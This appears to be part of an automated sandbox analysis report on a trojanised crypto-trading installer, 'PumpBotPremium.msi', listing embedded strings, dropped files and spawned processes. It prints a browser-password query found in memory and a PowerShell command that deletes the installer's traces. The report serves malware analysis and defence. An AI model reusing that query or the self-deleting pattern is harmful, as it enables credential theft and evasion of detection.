Source: BlockchainConnector.exe, 00000007.00000002.1907183150.0000019A14380000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://pyperclip.readthedocs.io/en/latest/index.html#not-implemented-error
Source: BlockchainConnector.exe, 00000007.00000002.1905482456.0000019A0CD30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://requests.readthedocs.io
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D584000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://scipy-cookbook.readthedocs.io/items/Ctypes.html
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://software.intel.com/openvino-toolkit)
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A141E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/18905702/python-ctypes-and-mutable-buffers
Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A141E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/questions/455434/how-should-i-use-formatmessage-properly-in-c
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stat.ethz.ch/~stahel/lognormal/bioscience.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.aminer.org/pdf/PDF/000/317/196/spatio_temporal_wiener_filtering_of_image_sequences_us
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78CC1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://streams.videolan.org/upload/
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: BlockchainConnector.exe, 00000007.00000003.1894585571.0000019A0C243000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894628577.0000019A0C246000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904396374.0000019A0C247000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1F8000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904035119.0000019A0BE30000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: BlockchainConnector.exe, 00000007.00000002.1904689424.0000019A0C530000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
Source: BlockchainConnector.exe, 00000007.00000002.1904689424.0000019A0C530000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: BlockchainConnector.exe, 00000007.00000002.1905407661.0000019A0CC30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/contrib.html#socks-proxies
Source: BlockchainConnector.exe, 00000007.00000002.1904852848.0000019A0C730000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/stable/v2-migration-guide.html
Source: BlockchainConnector.exe, 00000007.00000003.1894257723.0000019A09F8E000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1903643435.0000019A09F91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20080221202153/https://www.math.hmc.edu/~benjamin/papers/CombTrig.pdf
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20090423014010/http://www.brighton-webs.co.uk:80/distributions/wald.asp
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20090514091424/http://brighton-webs.co.uk:80/distributions/rayleigh.asp
Source: BlockchainConnector.exe, 00000007.00000002.1906290521.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://web.archive.org/web/20170802060935/http://oss.sgi.com/projects/ogl-sample/registry/EXT/textu
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.cazabon.com
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.cazabon.com/pyCMS
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cs.hmc.edu/tr/hmc-cs-2014-0905.pdf
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.ibm.com/
Source: BlockchainConnector.exe, 00000007.00000003.1893352229.0000019A0D26A000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D279000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3663.htm
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3666.htm
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/copyMatAndDumpNamedArgumentsOOO
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.littlecms.com
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mathworks.com/help/techdoc/ref/rank.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.mia.uni-saarland.de/Publications/gwosdek-ssvm11.pdf
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.openblas.net/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_VERIFY_PARAM_set_flags.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_verify_cert_error_string.html#ERROR-CODES
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.openssl.org/docs/manmaster/man5/
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org
Source: BlockchainConnector.exe, 00000007.00000002.1905042748.0000019A0C93C000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894056234.0000019A0C938000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893415079.0000019A0C8AF000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.python.org/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1906987998.0000019A13FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0506/
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tensorflow.org/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tensorflow.org/)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tensorflow.org/lite
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.usenix.org/legacy/events/usenix99/provos/provos_html/node4.html
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6 Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02 Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021BD60 GetForegroundWindow,MessageBoxW,GetCurrentProcess,OpenProcessToken,CloseHandle,GetLastError,ExitWindowsEx,CloseHandle, 3_2_0021BD60
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5c7177.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B99.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7BF7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C27.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C48.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C87.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7CB7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{26BCD435-D353-42A0-8C43-818FC0FA354F} Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7D93.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5c717a.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8554.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8CB8.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe File created: C:\Windows\SystemTemp\AI_D021.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe File created: C:\Windows\SystemTemp\AI_D021.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07A7CCFBD28A674D95D3BF853C9007C6 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6 Jump to behavior
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI7B99.tmp Jump to behavior
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd E63D4123D894B61E0242D53813307FA1FF3B7B60818827520F7FF20CABCD8904
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd C438DD66FA669430CCE11B2ACB7DC0EE72B7953B07013FDA6BF6B803C2C961F9
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 00215150 appears 64 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 00214E80 appears 65 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 0027D250 appears 54 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 00213540 appears 50 times
Source: unicodedata.pyd.4.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: BlockchainConnector.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: opencv_videoio_ffmpeg490_64.dll.4.dr Static PE information: Number of sections : 13 > 10
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: Number of sections : 19 > 10
Source: cv2.pyd.4.dr Static PE information: Number of sections : 15 > 10
Source: BlockchainConnector.exe.4.dr Static PE information: Number of sections : 12 > 10
Source: python3.dll.4.dr Static PE information: No import functions for PE file found
Source: qt5core.dll.4.dr Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: classification engine Classification label: mal92.troj.spyw.evad.winMSI@28/152@1/1
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002373A0 FormatMessageW,GetLastError, 3_2_002373A0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00255AF0 GetDiskFreeSpaceExW, 3_2_00255AF0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0025E870 CoCreateInstance, 3_2_0025E870
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00230620 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 3_2_00230620
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Coinsw.app Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\Coinsw.app Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF47F5555B91963625.TMP Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe File read: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Key opened: HKEY_USERS\S-1-5-18\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
Source: PumpBotPremium.msi ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PumpBotPremium.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B605B066270C5298BC361F916947E4D1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B605B066270C5298BC361F916947E4D1 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
